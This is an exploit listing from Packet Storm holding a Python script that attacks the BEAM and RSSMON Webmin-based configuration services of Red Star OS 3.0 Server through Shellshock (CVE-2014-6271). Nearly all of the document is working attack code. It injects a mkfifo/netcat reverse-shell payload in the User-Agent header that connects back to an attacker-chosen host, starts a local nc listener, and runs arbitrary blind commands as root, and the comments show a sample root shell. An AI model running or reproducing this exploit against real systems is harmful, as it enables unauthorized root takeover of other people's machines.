Lucene search

K
packetstormHacker FantasticPACKETSTORM:140205
HistoryDec 19, 2016 - 12:00 a.m.

RSSMON / BEAM (Red Star OS 3.0) Shellshock

2016-12-1900:00:00
Hacker Fantastic
packetstormsecurity.com
132

0.976 High

EPSS

Percentile

100.0%

`#!/usr/bin/env python  
# RedStar OS 3.0 Server (BEAM & RSSMON) shellshock exploit  
# ========================================================  
# BEAM & RSSMON are Webmin based configuration utilities  
# that ship with RSS server 3.0. These packages are the  
# recommended GUI configuration components and listen on  
# a user specified port from 10000/tcp to 65535/tcp. They  
# are accessible on the local host only in vanilla install  
# unless the firewall is disabled. Both services run with  
# full root permissions and can be exploited for LPE or  
# network attacks. RSSMON has hardened SELinux policies  
# applied which hinder exploitation of this vulnerability  
# be limiting access to network resources. Commands are  
# still run as root in a blind way.  
#  
# $ python rsshellshock.py beam 192.168.0.31 10000 192.168.0.10 8080  
# [+] RedStar OS 3.0 Server (BEAM & RSSMON) shellshock exploit  
# [-] exploiting shellshock CVE-2014-6271...  
# sh: no job control in this shell  
# sh-4.1# id  
# uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:beam_t:s0-s15:c0.c1023  
# sh-4.1#   
#  
# -- Hacker Fantastic (https://myhackerhouse.com)  
from requests.packages.urllib3.exceptions import InsecureRequestWarning  
import subprocess  
import requests  
import sys  
import os  
  
def spawn_shell(cbport):  
subprocess.call('nc -l ' + cbport, shell=True)  
  
def shellshock(soft,ip,port,cbip,cbport):  
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)  
if soft == "beam":  
user_agent = {'User-agent': '() { :; }; /bin/bash -c "rm /tmp/.f;mkfifo /tmp/.f;cat /tmp/.f|/bin/sh -i 2>&1|nc '+cbip+' '+cbport+' >/tmp/.f"'}  
else:  
shellstring = '() { :; }; /bin/bash -c "%s"' % (cbip)  
user_agent = {'User-agent': shellstring}  
print "[-] exploiting shellshock CVE-2014-6271..."  
myreq = requests.get("https://"+ip+":"+port+"/session_login.cgi", headers = user_agent, verify=False)  
  
if __name__ == "__main__":  
print "[+] RedStar OS 3.0 Server (BEAM & RSSMON) shellshock exploit"  
if len(sys.argv) < 5:  
print "[-] Use with <beam> <host> <port> <connectback ip> <connectback port>"  
print "[-] Or with <rssmon> <host> <port> <cmd>"  
sys.exit()  
if(sys.argv[1]=="beam"):  
newRef=os.fork()  
if newRef==0:  
shellshock(sys.argv[1],sys.argv[2],sys.argv[3],sys.argv[4],sys.argv[5])   
else:  
spawn_shell(sys.argv[5])  
else:  
shellshock(sys.argv[1],sys.argv[2],sys.argv[3],sys.argv[4],0)  
`